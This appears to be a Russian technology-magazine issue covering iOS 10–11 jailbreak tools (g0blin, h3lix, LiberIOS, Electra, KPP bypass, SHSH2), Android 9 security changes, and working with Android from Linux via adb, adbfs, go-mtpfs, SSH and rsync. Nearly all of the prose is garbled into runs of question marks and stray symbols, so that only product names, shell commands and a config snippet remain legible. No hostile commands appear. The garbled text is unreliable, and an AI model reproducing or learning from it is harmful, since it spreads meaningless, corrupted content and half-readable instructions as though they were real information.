????�??�??�???�??�?�??????�??�???�??�?????�??,�?�?????�?????爀x?
tract燿pkg�??�?�??�?�???�????�?.
g0blin:爄OS�.3.x,�-???,�???�?�??�?????�??�?燗7?A9
????�????� ?� ???�??� ???�????� ????�????�??� ???�?� ???�???� g0blin,� ???????
?????� ????�???� ????�????�??� ???�?� ???�??????� ??????�??� ?� ???�??� iOS.
?� ???�???�?,� ???�????�???�?� ??????� ??� iPhone� 5s� ??� iPhone� 7/Plus� ?????�
??????�?,� ?� ???�?� ????�???� iPad,� ????�???�????�??� ???�??�?????� ???????�
???� A7,� A8� ?� A9.� ????�???�?� ?� ???�????�?????� ???�??� iOS:� ????�?????
??????�?�???�?�?爄OS�.3?10.3.3.
???� ????� ?????� ?????� ???????�????�???�??�??� ????�?????,� ????� ????
h3lix?� G0blin� ??????�?� ????� ?????� ???�???�?,� ??� ???�?� ???�?????� ?� ????
??????�???�?��??�????爄OS,�??????��??�??�????�???�?.��??�??�???�
???�(RC1)�???�????�?�??�??�??�??燬SH�(dropbear)?�?�??�??�(RC2)燬SH
??�???�??,�燨penSSH�??�?�???�??�?????�?????�?�?燙ydia.
iOS�.0?11.2:燣iberIOS�燛lectra
???� iOS� 11� ?????�??�?� ??� ????�??� ????� ???� ???????� ????�????�?:� LiberIOS
?� Electra.� ???� ????�????�?� ??????�???� ????� ?� ???� ??� ???,� ????�?� ???�???
???�????�????�???�???�?.
???,� ???�????�??� LiberIOS� ????�?� ???????�?� ????�??�?� ?� Cydia.� Cydia
??� ????�???� (?� ??� ?????� ????�???)� ?� ???�??� ???�???,� ?� ??????�?????� ?????�
??????�??�?�??�?�??��??�?�????�???�???�???�????.
?�??�??�????�??燛lectra�???�??��??�??�???�????�?�??�??�??燬SH,
???� ?� ???????� ???�???�??� Cydia.� ????�?� ????� ????�?????� ??� ???????�???
?�?????�??????.
???�??�????�???�????�?爄OS�
?� ???�????� ???� ????�?� iOS� 11� ???�???�???� ?????� ???�??,� ???�?????� KPP?
less.� KPP� (Kernel� Patch� Protection)� ?� ????????� ???�??�?� ?????�???�?� ????,
????�??� ??????�????�??� Apple� ?� iOS� 9.� ????� ????????� ???�???�?� ??????�
??????� ????� ???�???� ???� ?� ???�??�?� ???�????,� ???� ?� ??� ???�?� ??????.� ????�
???�????� ???????�?� KPP� ?� ???,� ???� ???�??�??� ???�??�?� ?????� ????� ????�
????�?� ?� ???�??�??� ??????� ???�???.� ????� ??� ????�????� ??????�???,
?� ???????� ????�?� KPP� ????�????� ????�????� ?� ????� ???�???� ?� ???????
????�?� ???????�????�?.� KPP� ???� ???�??????� Apple� ?� ???�??� ???�???
???� ??????� ??� ????�????�?,� ??� ?� ???�??� ????�????�?� ????� ??� ????� ?????
??????�(??�???�??�???��?????).
?� ????�????�??� ????�????�??� ????????� KPP� ???�?????� ?????�???.� ????
???�??� ???�???� KPP� bypass?� ????�?� ??� ??????�???�?� ?� ????�????�??� Pangu
?燳alu.
?� ????�????�??� iOS� 11,� ????�??�??� ??� ?????� ???�????�?,� ???�????�???
??????� ????�?� KPP� ???�??� ???�????.� ??????� ????�?� ????,� ???�?� ???????�
????�???� ????,� ????�?????� ??????�???�?� ???�??� ???�?� ???�???� ?� ??,
???????� ??� ???�???�???� ???????�??� KPP.� ??,� ???�?� ??� ????�?� Apple
????????�??�??�?��???�???????�??�????�??�???��??�??�??�???????�
???爄OS��?�???�???�???�牜?????��??�??�!
??�??�????�????��?????�??�????�?�??�???�???�????�??????�?燙y?
dia� Substrate,� ???????� ??????�???� ??� ??????�???� ???�????� KPP.� ??� ??????�
??????� ????� ?????�???�??� ????�?????,� ?????�????�??� ???�??�??� Cydia
??爄OS�,�燛lectra.
??�?�???�???�?????�??�???????燢PP��??�???,�?????�?�??�???�??
???�????�???�??�??�??�???�????�?,��???�???:燞ow燢ernel燩atch燩rotec?
tion燱orks燼nd燞ow燞ackers燘ypass燢PP.
???????????�?????
????� ?� ????:� ????�??�?� ????�????�?� ?� ???�???� ?????� ???�???�?� ?????�
???????.� ???� ??� ???�??,� ???� ??� ??� ???�???� ???�??�?????� ??????�???� ?????
iTunes� ???� ????�???� ???� ?� ?????�???� ???�???�??.� ????�??,� ???�???�?
?????�???�?,�??�??�???�??��??��??�??�??�??.
??�??�??,� ??� ????�????� ????�?????� ??� ???????� ?� iOS� 11.1.2.� ?????
????????� ???�?� ???????�????� ?� ??????�???� ?????�????�??� ????�?� ???�???
?�???�????,�???�???�???�?????�?�?????�????.�????��???�???�????�
?????
??????�??,� ??� ??????� ???�???????� ????�???� ???????� ?� ?????�???� ????�
????�??.�???�??�??�????�??�???,�?�??�?�???�????�?�(?�??�????�
?� ??????�??� ???�??)� ???� ???�?� ?????� ??????�?� ?� ???�???,� ???�???� ?� ?????�
??????� ???�?????�??�?� ??� ??????� ?� ?????� ?????�?????� ???�??�???� ?????�
???�?� ???????????�??.� ?????� ????�??,� ?????� ?� ?????�???� ???�???�??
?????�?????,�?�?�??�?�?????�???�???�????�???�???.
???�?????�??燗pple�???�?�??�?�?????�?????�??�??�??�????�??????�
????�????爄Tunes.��???�??�??�??�???�?�??�?????�??�??爄OS��???�???�
???�??�??�?,�??????��????�???�??�???��??????.
?� ????� ??� ??� ??????�??�?� ????�??�?????� ???�?????� ???�??� iOS,
???�??????�????��?�????�??�???�???�????�??�???�?�?????�?????�?
??�??�????�??�??,�?�??????�?�??�??�?????
??�??� ???� ???� ?????????� ???�?????� ????�???,� ?????�?� ?????�??,
???� ??????�?� ???????�??� (???� ????�???�??�?)� iOS.� ???� ????� ???�?� iPhone
????� ????�?????� ???�??�?,� ???� ???�???�???� ???�???�?� ?� ???�????� Apple
?� ????????� ???�????� ???�???.� ???� ???�????� ???�???� ?????� ???�???�???�?
????�?�??�??�???�???�????�??�?�?????�???��???�?�??�??�???�??�???�
???爄OS.
???�?????,�????�??�??�?��????�燗pple.�???�??�??�??�????�????�
???�?� ???�???????� ??� ???� ????� ???�??� ???�??�?,� ????�?????� ??� ?� ????
???????� ???� ????�??� ??� ??� ???�???.� ????� ????????� ??� iOS� 11,� Apple� ???�?
????�?????� ???�???????� ???�?????� ???�??� 11.1.2,� ???� ???????� ??????�?
????�?????.�????�???�??,�??�?????�???�??�??????�?�??�???�???�
???�?????�??????�???�?�?�??????�(????�?��???�?????�??)�??�??爄OS,
???????燗pple�??�?????�?��??�?????�?????.
??�?� ??� Apple� ???�??� ???�?????�?� iOS� 11.1.2,� ??� ??� ????� ??� ???�?????
???�?燬HSH2�?� ???�???�??��DA�??�????�?�??�????�?????�????�??
???�???�??.�?????�??�??�?燬HSH2,�?�???�?��????�?????��??????
???�??�?????�???爄Phone�?�??�??�??�??�???.�??,�?�??�??????�??�??
???�????�???��?????,�??�?燗pple�??�??�?????�?�??�??�??�??爄OS.
?� ???� ??� ?????,� ?????� ????!� ????�?� ???�??� SHSH2� ??� ??????� ????�
????????�??�?????�???�??�??�????�??�????�??�???燗PFS�??�?�??�?
????�????�?.� ?� ???�??� ?� ????�??� Electra� ???�??� ????�??� ???�????� ????�
?????�??�???�??�???�?��??�??�?�???�?�?????�???.�??�??�????�????
APFS�??�?�???�????�?,�?�??�???�???�???�?��?????�?�??????�?????�
???�????�??�???.
???�???�?�??�???�???,�??�?牜?????燗PFS粻?�??�?�??�???�??
????�?????�?,� ???�??????� ?� ???�??�????�?� ?????�????� ???�????� ????�
????燗pple�(APFS),�?????�?,�??�???�??��??�?????�??�?�??�?,�??????
???�???�???��???????�?????�?.�??�?�??.�??�??�??�??�???�?�???�???
APFS� ????�???� �????� ???�??�??�????粻 Windows,� ???�?� ???????� ???�?
?�?????牜??????�??�???�.
???� ???� ??????�?� Electra� ?� ???�?� ?????�??� ???�??� (??�????�??� ??????�
????�???�?�?燙oolstar,�??�????�???�???�????�?燛lectra):
1.�?�??�??�??�???�???�?????�???,燛lectra�??�????�??�?????�??�????
???�???� ??????�???� (????� ???� ????�??�??� ???�??� ????�?????� ???� ????�
???�??�??�??,�??�??�?�?�????�???�???).
2.�?�?�??�????�??�???�??�??�?�牜???�????�?�??�??粻???�?????�(?????�
??????� ????�??�???�???� ??� ???�??� ???�???,� ???� ????� ????�??�???� ????
??� ????�???????�??� ???�??� Electra� ?� ???� ???�??,� ??????�???�???� ????�
??????�??�??),�????�??�??�???�??�??�????�??�????�??�???燗PFS.
3.�?�?� ??� ???� ????�??�??� ???�??� ????�?????� ???� ????�???�?� ???�??
?????�????�?�???�??�?????�????�??�????�??�???,燛lectra�??�????
???�??????�??�?�??�??�????�??�???�?�???�?.
??�????,� ????�??� ???�??!� ?� ???� ???�??�?????� ???�??� ??� ??� ???�?� ????�?,
?� ????�?� ???�???� �???�?�,� ???????�??� ??� ????�????�??� ??� ????� ???�?� ?
?????�??�??�??�?????:�??�??�??�??�???�(???�??�????�燬emiRestore11)
????�?�????,�?燙oolstar�??�???�????�???�??��??�??�??�??�?.
?� ???????� ??� ???�???� ???�???�?????�?� ????� ???�????,� ??� ?� ?????� ????�
???�??:� ???�??�??�??� ?????� ????�??� ??� ???�?????� ??� ??????� �??�?� ???�?
????�?�,�?�???�?????�????�??�????�??�???,�??�??�??�?�??�?�????�
???�?�???�????�?,�?�????�??�??�??�???.
???�?�??�?????�??�???�??�?�???�????�?,�???�??�?�????�???�???
??????�???��????�???�??�???�??�(Reset�燛rase燼ll燙ontents燼nd燬ettings).
???�???�?�????�??�???�??�??�??�?� /var,��?�???????�??�??�??�??
???�???�(iOS�.0?11.1.2).
??�??�??�?????�??�?�???�?�????.�???�?????�?�??�???�??�????
SemiRestore�??�???�??�??�?????�??�???�?,�??�??�???�???�??�??�??,
??????�????�?�?�??????�???�?.
???�??�????�??�???
??�????� ???�????�?,� ???�???�???� ????????� ???�?� ?????�???�?????�?,� ?
???�???�???.�?�??�?�????�?�??�??�??�??????�爄OS�??�???�???�????�
??????�??
??�??� ???�?????.� ???� ????� ???�?� ???�???�?????�?� ???�???????� ?� ?????�
????�?????�???,�??�?�??�?????�??�?????�??�??�??,�??�?????�??�???�
????�??�??�????�??????��???�?��??�??�???�???�??????��???�?????
???????�??� ?????�????� ?� ?????�??�??.� ???� ????�??�????� ???????�???
?????�????� ?� iOS� 11� ???�???�???� ??� ????�?� ???�??�???�???� ???????,� ??� ?
????�?�?????�??�????�?.��???�???????�?????�??�????�?,�?�???�???�
???� ???�????�??� ???�?� ???�???� ?????�???� ?????� ??????�?� (????�??� ???
??????� ??� ???�??�?� ?� ???�????,� ??????� ??� ????�??�??� ?????� ????,� ???�??
???�?,� ???????)?� ????� ??� ?????�???� ?????� ????� ??????�?� ???????,� ??� ???
???�?� ????�???� ???�???�?� ?� ????� ???�??.� ???� ??????� ??????� ???�????�?
???�?� ????�???� ???� ????�???� ??????� ??� iCloud,� ???�?????�???� ???� ???�???
???�??� ??� ????� ??????�??,� ???????�??�????�??� ?� ???� ??� ????�??� ??????
Apple?� ???????,� ???�?� ???�?� ????�???� ???????� ??� iCloud,� ??� ????� ??????
??燗pple營D.�??�??�?�??�??�???�?��?????牜???�??�?�??�???�爄Phone,
????� ???�???.� ???� ???�???� ???�??,� ???�??� iCloud� ?� ???�???�?� ??????�??
??????�???�.
???�????�????�?????�??�???�????�???�???�???�????�??�??�??�???�
????????� ????� ????????� ??� ????�??� ????�?????�?,� ??,� ???????,� ???????.
?????�???:�???�??�???�???????,�??�??�??�?,�????�?��??�?�???�????�
??:� ???� ???�???�??� ?� App� Store� ??????�???�?,� ?� ????�????,� ???�??�???�
??????�??�??�??�??????,�???�?�??�??�??.
????�????�??� ?????� ???�???�?????�?� ???????� ???� ????,� ???�?� ???????
?????�?????�??� ???????�??� ??� ??????�???� (???????�??� ?????�????� ????�
???,� ?� ???�???,� ???� ??????� Elcomsoft� iOS� Forensic� Toolkit).� ???�?????
???�?????��?,�?�???�?��???�?????�???�???�?????��??,�??�??�?
???????�?�???�??�????�???�????�(?�??????),�?�??????�??�????�????
???�??�???�??�??��??�??�??�???�???�?�???�???�??�??�?,�??�?????
?????� ?� ???�?????� ????�??� ???�?????�????� ??????�???.� ???�?� ????????
???�??��????�????�??�???�??��??�????,�??�??�???�?????�??????�?
?燭elegram,燱hatsApp�??燜acebook燤essenger.�??�?�???�??????�??�???�
???� ???�?� ???�??�?.� ???� ???????,� ?????�????,� ?????�??� ???????�??,
??�??�?�?�??�????�???�?????,�??�????�??�??�??�??爄OS��???�?????�
??�??�(?�????�????�??�??��????�??�??�?�??�???�??�??�????),�?
????�?????� iOS� 11� ???�????�?� ???�??� ????�???�??????�????�????,� ????�
??????�??�?�??????�????��??????.
WWW
??�?� ????� ????�?????�???� ????� ????�????�??
???�??� ???�??� iOS� ?� ???�?� ??????�???� ??� ????�
??????�????�?:
?Jailbreak� update:� a� summary� of� current� tools.
?????� ???�????� ?????�???� ???�??�????
?????�????�??�?????燢PP?less�???�????�???
???????�???� ????�???� Cydia� Substrate
?�?????�???�?�??????燬ubstitute.
?Electra� jailbreak� for� iOS� 11.0?11.1.2.� ?� ????
??????�??�???�??�??�????�??�???�???�????�
?????�?� ?� Electra,� ????�??�???� ?????� ?????
???�??�?????� (KPP?less,� ???�??�??� Cydia,
????�??燗PFS).
??????????
??� ???�???�???� ???� ???�??� ???� ????�????�?� ????�??�??� ?� ????�????,
??????�???� ???� ???????�???� iOS� 10� ?� 11� (??� ???�??� 11.1.2).� ????�??� ??
????�????� ??????�?� ???�???�???�??� ????�??.� ???�???�?� ??� ???�???�?
Google,�??�????�??????�??�?�??�????�??��??�??????,�?�???,�??????
???� ???� ????�?� ??????�???� ?� ????� ??� ???�?????� ????�?????�???� ???�??
??�??�?�?????.
???????????
????? ?????
ANDROID 9
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
???燗NDROID�????�???????
???????????��???????????
?????????????
????�???� ???�?� Google� ????�??�???� ????�???????�??
??????� Android� P,� ???????� ???�?� ??� ????�????�???� ?????�
????????� ????�?� ???�??� ???� ??� Android� 9.� ?� ?????� ???�??
?� ???�??�??� ???� ????�??�?� ?????????,� ?????�???� ?????
???�???� ??????� ???�??�????,� ???�??�??� HDR,� ????� ?????,
??� ????� ???�????,� ???� ????�?,� ????�???�?� ???�?� ?????�?
?????� ????�??�??:� ???????�????� ?� ?????� ???????�?� ?????�
????�??.
??????�?�??????�????????????�?????��????????
??� ?????� ??� ?????� ?????�??� security????�????� Android� ???�?� ?????�??
???�?�?????�?????燗ndroid燩,�?????��??��?.�??,�????�?�?,�??�??
??� ??????�??????� ??????,� ???�?????� ?� ?????� ???�????� ???�???�????,
???????�??????�?��??�?????營dle,�?�???�???�???��?????�?��???.�??
???� ???�???� ????� ???�???,� ???????� ?????� ???�???� ?� ???�???� ???�???�????
???�??,�?????�??�??�???�???�?.
??� ????� ????� ?????:� ???� ????� ?� ???�??,� ????�????�??�??� ???� ????�?
????�??�??� ????� ???�??�??� ???�???�??,� ???�???�???� ???�??�?� ???�???
?�???�???????�??�???�????,�??�?�??�???�??�?�???�???�??�??�????�
????.
???� ???�?� Google� ?� ???�??�??� ???� ????�???�?� ??????�?????� ???� ???????�
????爁oreground爏ervice.�??�??�????�??�??�??????�???�?,�??????�???�
??�??�??�????��?????�??�??�????,��?????�????�?�???�?????�?.�???�
??� ??� ????�?� ????� ??� ????�?????�?� ??????� ???� ???�??�????� ????�??�??�?
?????�??�?.
??????�?燙LEARTEXT燞TTP
???�??� ???�??� ?????�??????� Android� P� ?� ???�??� ???�??� ??� ??????�??????
HTTP� ???� TLS� (??� ????� ???� ???�??????)� ???� ????� ???�???�??,� ???�?????
???�????�??�??燗ndroid.�??�???�??�???,�???�� build.prop�??�???�??
???�??� targetSdkVersion�???�?�,�?�??�???�??�?�??�??�??�??�????�
??��??�??�?燞TTP.
???�???�???�??�??�?�????�??�?�???�?,�???�??�???�� ???�?�???�
???�?� ???????�????� ????� (network_security_config.xml)� ???�??� ????�
?????�??�??????:
<domain-config cleartextTrafficPermitted="false">
    <domain includeSubdomains="true">secure.example.com</domain>
</domain-config>
??????????�????????�????
??�?� ???� ???�???� ???� ??� ????�???�???,� ??� ?� ???�?????� ?????�??� Android� P
???�?�????�??�???�?????,�??�?????�?�????�????�??�??�?????�?????�
????�????�??�??�?�??�???�??,�???�???�??�?�?????�?????�燝oogle燚ri?
ve.�??��??�??�?�???�???,�??�???�燝oogle�?�????�??�???��??�?�???�
???.� Apple,� ????�?,� ????�?� ???�?� ???�??� ?� ?????�???� ????�?� ?� ????�???� ??
????�??�?�??�???�?�??�???.
???????�????????????��??????�?燤ITM
???�???�???�??�??�????�??????燗ndroid燩��??�?????�??�??�??�???�
?????�????� �??????�??粻 ??????� ???�??????�??� (Con?rmationDialog).� ??
???�???�?� ????�???????�?,� ???� ????�???????� ???�???�???�?� ???�??� ?????
?????�?��??�????�?��??,�???��??�??�??,�???�???�???�???�?????�?
???�???�??��??�???�?????�?�??�????�??�????��???�???�??.
??�?� ????�???????� ??????�???�?� ????�???� ??� ????�????� ?????�?,� ????�
????�??� ??????�?� ????�????�????�??� ???�???,� ???????�??� ?????� ??????�
??????�??� ????�????� ?� ???�????????� (HMAC).� ???�???� ???�???�?
???????�??� ???�??� ???????�??� (TEE),� ???????� ??????�?� ?????�????� ????
?� ?????� ????�?????�?.� ???�???� ????�???,� ???� ????�???????� ???�???�???�?
???�??�???�????��??�????�?��??.
??????�?�????????????�??????燗PI
?燗ndroid�???�??�???�??,�????�?????�???�??�??�???�???燗PI.�?�??
???�??�???�?� ?� ???� ?� ???�?????�??�???�?,� ???� ????????� ???�??� ?� ????� API
?�??????�??�?????.�??�?�??�???�?��??�??�??�????�???�??�???�??,
?� ???� ???�????� ?� ???�????�??� ?� ???�?????�??�??� ?� ??????� ???�???�??
(????�??燗PI�????�?????�?��???�???�?�??�??��??�??).
?燗ndroid燩�??�??��???�??燗PI�??�????.�????�???,�????�??�??燗n?
droid� ???????� ???�??�????� ?� ???� ???�??,� ????� ???�???�??� ??????�???� ????�
????????� ????�??�???� (deprecated)� API.� ???� ???�??� ???�?????� ???�?????�
?????�????�?�?�?????�??????�????燗PI.
?????????????????�?????燬TRONGBOX
??�???�??� ??� ??????�??,� ????�??�??� Android� P,� ?????� ?????� ?????�????
????�????�????�??�?????燬trongBox,�?????�???��????�????��??????
TEE�(Trusted燛xecution燛nvironment,�??�????,燭rustZone��??�??�????燪ual?
comm).� ??� ????,� ????� ??????� ?� ?????�????�??� ?� ??????� Keymaster� HAL
(Hardware� Abstraction� Layer),� ???????� ?� ???????� ???�???� ??� ????�???�???
?????�??�????�?,�????�????�??�??�???�???�??�?????�???�??�??�???.
???�??�???�??�?????�燢eymaster
??????????燨MAPI燗PI
Android� P� ???�????�???� GlobalPlatform� Open� Mobile� API� (OMAPI� API),� ?????�
?????�??�??� ???� ???�???� ?� ???????�??� ???�??�??� (Secure� Elements,� SE),
???�????�??� ???�??????,� ???????� ????�?� ????�??�???�???� ?� SIM????�?,
???�??�???� ???�?,� ???�?� ????�?� ???�???� ?� ????�??�?� ?� ???�??�???� ????�
??????�???�??�????.
Secure燛lement��?????�??�??�????�??�??��???�???�??�??????.�?
????�???� ??� ???????�??� ???�????� ?� ?????�????� ???�??�??� ???�???�??.
?�???�??�??��??�??�???燦FC燬ecureElement�???�?�??�?��??????�???
???�?,�?�??�?�????�???????�?燬IM????�?�??�???��??�?�?????.
????? ???????
? ??�????� ?� Android� P� ???�???�??� ????�?� ??� ???�??� ???�?????� ?????�??
?????� ??????�???� ?????� ???????�??� Build.SERIAL.� ???� ????�?� ?????
???�?� UNKNOWN.� ???� ??????�??� ?????�???� ??????� ??????� ???�?� ????�
???????燫EAD_PHONE_STATE.
? ??�??�???� ?????�??� ???�??�??� ???????�???�???????�???� ?????�???
???�?� ChaCha20,� ???????� ?� ???� ???�?� ??????�???�?� ?� ???�??�?� Chrome
???�????�????��??�???燝oogle,��???燣inux�??�?????�??�??�??�??
?????���?????�??�??�????�?????�???�??????.
? ???�???� SELinux� ??????� ???�???�?� ???�???�???� ??????�?� ???�???
?� ???�???� ???�???�????� ?????� ???�????�??� ?????�??� ????� ???�???
??�??�?.
? ?� ???�?????� ?????�??� Android� P� ???�???�???� ????�???� ???�??�??� ????�
??????�??� MAC?????�??� ???� ???�???�????� Wi?Fi??????.� ???� ???�????
??????�?��????�???�???�???�?????�??�(?爄OS�????�??�???�????�??
???��??�??�.
?????
ANDROID
???�????????
??????????
????????
?�?????�燣INUX
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
Android� ?� ???�??�???�?� Linux� ??� ????�?� ????�???�??� ??� ?
???� ????�???� ??� ?????� ????� ?� ??� ???�??� ????�?� ?????
??????.�燗ndroid�?????�?�???�???�??�?????燣inux,�???
???�?� ????�?????� bash,� ??????� ?????�?� ?� ????� ?????�???
???�???.� ????�????� ??� ????�???� SSH,� ??� ??????� ??????
??�???��??�?��???�?????�?????爎sync�??�??�??�????�
???�??�??.�??�???�???�?��?????�??�????�?.
ADB
???�??� ?� ????????�???� ???�??�??�?� ????� ????�??????� ????�?????�??� An?
droid�燗DB.�?�??�??�?�??�?????��??,�???�?�????�???�?�??�???
???�?????�?.� ????,� ADB� ???�????�???�???� ???� Android� Debug� Bridge,� ?� ??
????� ???� ???�?� ???�?� ???�???� ???????�??� ????�??�??� ?� ???�?.� ADB� ????�
????�?�???�??�?????��????�???�???,�?????�???�??�?��?????�???��?
??????�???��????�???�??�??�??�??�?????.
???�?� ???�??�??� ADB� ?� Windows,� ????�???� ??� ????�??�?????� ????�???
?� ???????�?????� ??????,� ?� Linux� ??� ????�?� ??????�?.� ???�????�?� ????�????�
????燗DB�?�???�??�?�(???�???�?��??�??�????�????��??????�?燯SB)
?�???�?????�????��??�????燼db��??�???:
// Ubuntu/Debian/Mint
$ sudo apt-get install adb
// Arch Linux
$ sudo pacman -S android-tools android-udev
??�??�???�?????�??�??�???�???�???��??�?��?????�???�???�????�?.
??�???�??�???�?�??�??�??�??�?????�??:
$ adb devices
??�????�?�?�??�??�??�??�?????�???燗PK:
$ adb install file.apk
??�???�????�??�?�?�?????�???:
$燼db爌ush�???�/sdcard/
???�???�??�??�?��?????�???:
$ adb pull /sdcard/DCIM/Camera/photo.jpg photo.jpg
???�???�????�??��??�???�??�?�???:
$ adb shell screencap /sdcard/screenshot.png
$ adb pull /sdcard/screenshot.png
$ adb shell rm /sdcard/screenshot.png
??�????�???�?燩ower:
$ adb shell input keyevent 26
??� ?� ?????�?� ??,� ADB� ???�?� ??????�?????� ???� ??????�??� ???�???� ?� ??????�
????�???�?�???�??�?:
$ adb shell
???�?� ????�???,� ???� ADB� ?????� ????????� ??� ????�?� ??� USB,� ??� ?� ??� Wi?Fi,
????�?� ???� ???�?� ???�?� ???�?� root� ??� ??????�???� ?� ???�???�??� WiFi� ADB.
?????�???�??�???�??,�???�???�????�???????��??�????�???�?��????�
???�?��??????燼db燾onnect��??????�???�??�???�???營P?????�?:
$ adb connect IP-address
WARNING
?� ??????�??� ???�??�???�??� ADB� ?????
??� ????????� ???� ????� root.� ???� ???�???�??� ?????
??????�???� ???�????�??� ???�??� Udev� ?� ???�???�
????�?.� ???�??�?� ????� ????�??�?????� ??
???�?????�??�????�(android?udev�燗rch燣in?
ux),�???�??�??�????燯dev�????�??????�?.
ADB-SYNC
ADB� ???�?� ??????�?????� ?� ???� ???�??�???�??� ???�??� ???�?� ??????�???�?
(???�??�?�???�???�????爏ync),�???�?�???�??�??�???�?????�?�????�??
adb?sync.�??�??�????�?�??�???��????�???.�??�????,�??�??�?�??�???�
????�?????�?????�?�?????�???��?�?:
$ adb-sync ~/Music/ /sdcard/Music
?�??�????�???�?�?�??�??�???�??,�?��??�???�?�??�??,�??????�???
???�???�?�?:
$ adb-sync --delete ~/Music/ /sdcard/Music
????�??�??�??�??�???�??�?�?�???�(????????�??�??�???�??):
$ adb-sync --reverse /sdcard/Download/ ~/Downloads
ADBFS
???� ????� ????�??�??� ???�??� ????????� ???�??� ?� ???�??� ??� ??????�???
?�??????燗DB��?????�?????� adbfs,�???�???,�??????�??�???�?�????�
????????�?????�???�??,�??�?�??�???�?�??�????�??�??�?????�???.
???�?�??�?�???�?????燼dbfs�燗rch燣inux.�????�??�???�燗UR,�????�?
???�????�?�????�???�???�????�?:
$ yaourt -S adbfs-rootless-git
?燯buntu��??�??�??�????燼dbfs�??�??�?�???????�???�??:
$ sudo apt-get install libfuse-dev android-tools-adb
$ git clone git://github.com/spion/adbfs-rootless.git
$ cd adbfs-rootless
$ make
??��???�?�??�?�??�??�???�??�????�??�???:
$ mkdir ~/Android
$ adbfs ~/Android
???�????�????:
$ fusermount -u ~/Android
GO-MTPFS
???� ????� ????�??� ???�??�????� ??????�???� ???� ???�????� ???�???� ?� go?
mtpfs,� ???�????� ???�???,� ???�???�???� ??????�???� ???�??� ??� ???�???�?
MTP.�???�?�???�??�????�?????�???�?��???�??�??�??�??�?�?????.
?燗rch燣inux�???�?????爂o?mtpfs�????�???�?:
$ yaourt -S go-mtpfs
?�??�??�??�??�???�??�??�???�?�???�??:
$ sudo apt-get install golang-go libusb1-devel
$ mkdir /tmp/go
$ export GOPATH=/tmp/go
$ go get github.com/hanwen/go-mtpfs
$ go install github.com/hanwen/go-mtpfs
????�?�??�??�?�??�??�????,�??�燼dbfs:
$ mkdir ~/Android
$ go-mtpfs ~/Android
???�????�????:
$ fusermount -u ~/Android
SSH
????�?????�?????燗DB�??�???�??��?????�????�????�???????�?�?????�
???,� ????� ???�?????,� ???� ???� Android� ?????�??�?� ???�?� ???�???�?� ???�?????
SSH????�????,� ??� ???�?????� ???�?� root.� ???� ???� ?� ????,� ??� ???�??� ???�???
SSH�????�???�??��???????�??.��????�??�????�????�??�???�??????
???�???� SimpleSSHD,� ????�??� ???�???�??� ????�??� ???� ???�????�???� ????�
?????� SSH????�???� DropBear� ???� ?????�??????� ???�??.� ????� ?� ????� ????
root,�?�??????�??�??�?�???�?????� BusyBox燨n燫ails,�????�??�??�?????�
????�???�?,�????�??�???�??��??�??�???�??燣inux.
??�???�?????� SimpleSSHD� ?????� ????�?.� ?????�????,� ??????�??� START
?�??�??�????�?��??�??�???營P?????�?�(????�22):
$ ssh 192.168.31.236 -p 2222
?� ??????� ???�??�????� ??� ????�?� ??????�?� ????�???�??� ??????,� ???????
???�???� ???�???� ?� ???�???.� ???� ??� ?????� ????�??� ???�??� ?????�?????�??,
??� ??� ??????� ???�??�??� ?????�?????�??� ??� ???�??.� ????�?� ????�??�??
????� ?????�??� ????� (~/.ssh/id_rsa.pub)� ?� authorized_keys� ?� ??????
?�??????爏sh�?�??�?�?????�???�??�?.
SimpleSSHD
BASH,燭MUX,燤C
SSH????�??� ??� ????�??�?� ???� ??� ????� ?????�???� ???????� ???�?????�?,
??�??�???�?�??�?�??�???,�???�???�?????�?�???�???�???�????�??
???�??�??�?,� ?????� ???� bash,� tmux� ?� mc.� ???�?????� ???�????� ?� ???� ???�?
?�????�???�?????�?�??�?�?????��???�???�?��??�??�???�??????�?.
?� ???,� ???� ????�?????� ??� ????�???� bash,� tmux,� mc� ?� nano,� ?� ???� ???�???�
?????��?????�??�??�??�?�???�???�??�?,�?�??�???�???�??�?????�?.
?�??�?�??�??�???,�??�???�??�???�???�??�?爎oot�?�???�??�?.
????,� ???�???�?� Terminal� IDE,� ????�??�???�???� ?????� APK� ?� ZIP,� ????�
??????�???,�??????�???� assets/system?2.0.tar.gz.mp3,�???�??�????�
????,� ???�??� ???�??????� mp3,� ?� ???�?????�???.� ????�?� ?????� ???�??�??
??????�??��??�??,�?�??????�??�???�???�?�???�?爏ystem/bin�爏ystem/
etc/terminfo.�??�??�????�??�??�??�??�??�????�??�????�?,�??�???
???�????�?,��?????�??�??????.�??�??�???�????�??�??�??�??�?�??�???�
???�???�??�??�??.
???�?????� ???�???� ?� ???????� terminfo� ?????� ??� ???�?� ??????� ????�??�?.
?????� ???�??�???� ?� ????� ??� SSH� ?� ???�?� ???�?????� ?????�?,� ???�?
????????�??�???????�?????�????�??�????�?�?????�?:
$ su
# mount -o remount,rw /system
??�??�??�????�??�??�??�??�???�� /system/xbin/��???�???�?�??�??
???????�??�(??�??�???燽ash):
# cp bash /system/xbin/
# chmod 755 /system/xbin/bash
??�??�??�??�???� /sdcard/ssh/.bashrc,�????�?��???�??�?????�????�
??:
export TERMINFO=/sdcard/terminfo
export TMPDIR=/data/local/tmp
export PS1="\u@\h:\w \$ "
??�???� ???�???�?� SimpleSSHD� ??� ????�??�?� ?� ?� ?????� Login� Shell� ???�?� /
system/xbin/bash,�???�???��????�????�?�??�??.�??�??�?????�??�?
??燬SH�????�???燽ash��????�??�????�??�???�??�??�????�??�???.
???�?� ??????�?� ???�??�???� ??????� Vim� ?� mc,� ???�????� ??� ???�?� ??????
???�?� ??????�?� etc/mc� ?� etc/vim,� ?� ?� ????� /sdcard/ssh/.bashrc� ??????
????�?:
export MC_DATADIR=/sdcard/mc
export VIMRUNTIME=/sdcard/vim
Midnight燾ommander,�??????�??�燗ndroid
RSYNC
SSH????�??� ????� ???� ???�???????� ??????�?????� rsync,� ???�??� ???�???
???�??�??�???�??��?????�??�??.燫sync�??�???�?�??�???�????�??�???
???�??�?????�??� ???�??�???�??� ???�??� ???�?� ???�?� ??????�?� (???
???????� ?� ????�??�??,� ???� ?� ?????� ???�??)� ?� ??????�???�?� ????�?� ?????
?� ????�??�??� ???�??� ?� ???�????????� ?????�????�??� ????�?????� ???�???�
????�??.
????�??�??�??�??�?????�??????爎sync��???�?�?�???�??�??:
$ rsync --update --progress -e 'ssh -p 2222' -azv 192.168.31.236:/sdcard/DCIM/Camera ~/Photos
???� ?????�?� ???�???�?� ???� ?????�????� ??� ????�??�?� ?� ???????� ~/Photos,
